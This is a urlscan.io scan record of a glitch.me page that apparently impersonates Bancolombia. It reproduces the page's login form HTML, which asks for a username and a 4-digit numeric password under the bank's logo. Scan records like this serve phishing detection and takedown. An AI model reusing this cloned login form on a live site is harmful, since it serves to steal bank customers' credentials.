seemly-immense-collard.glitch.me Open in urlscan Pro
34.227.36.200  Public Scan

URL: https://seemly-immense-collard.glitch.me/
Submission: On August 04 via manual from HU — Scanned from CA

Form analysis 1 forms found in the DOM

<form class="form" id="loginForm">
  <div style="padding: 20px">
    <div style="text-align: center">
      <img src="https://marcas-logos.net/wp-content/uploads/2021/06/Bancolombia-logo.png" width="200">
    </div>
    <div style="text-align: center">
      <h2>¡Hola!</h2>
    </div>
    <div id="is-relative">
      <input type="text" id="usuario" placeholder="Ingresa tu usuario" minlength="1" maxlength="20" style="
                background-color: transparent;
                border-bottom: 0.1rem solid #fdda24;
                padding-left: 43px;
                font-size: 16px;
                border-radius: 0px;
                border-top-width: 0px;
                border-right-width: 0px;
                border-left-width: 0px;
                outline: none;
                transition: box-shadow 0.2s ease-in-out 0s;
                width: 85%;
              " required="">
      <span id="icon">
        <i class="fas fa-user"></i>
      </span>
    </div>
    <div id="is-relative">
      <input type="password" id="password" placeholder="Ingresa tu contraseña" maxlength="4" inputmode="numeric" style="
                background-color: transparent;
                border-bottom: 0.1rem solid #fdda24;
                padding-left: 43px;
                font-size: 16px;
                border-radius: 0px;
                border-top-width: 0px;
                border-right-width: 0px;
                border-left-width: 0px;
                outline: none;
                transition: box-shadow 0.2s ease-in-out 0s;
                width: 85%;
                margin-top: 30px;
              " required="">
      <script>
        document.getElementById("password").addEventListener("input", function(e) {
          this.value = this.value.replace(/[^0-9]/g, "");
        });
      </script>
      <span id="icon">
        <i class="fas fa-lock"></i>
      </span>
    </div>
    <button type="submit">Continuar</button>
  </div>
  <div>
    <img
      src="https://sucursalpanama.grupobancolombia.com/wcm/connect/sucursalpanama.grupobancolombia.com28508/c829dfcb-f89d-4fd7-915d-4210768913e8/lines-left.svg?MOD=AJPERES&amp;CACHEID=ROOTWORKSPACE.Z18_K9HC1202P875D06OV938LS1697-c829dfcb-f89d-4fd7-915d-4210768913e8-nK3K0Nt"
      style="width: 100%">
  </div>
</form>

Text Content

¡HOLA!



Continuar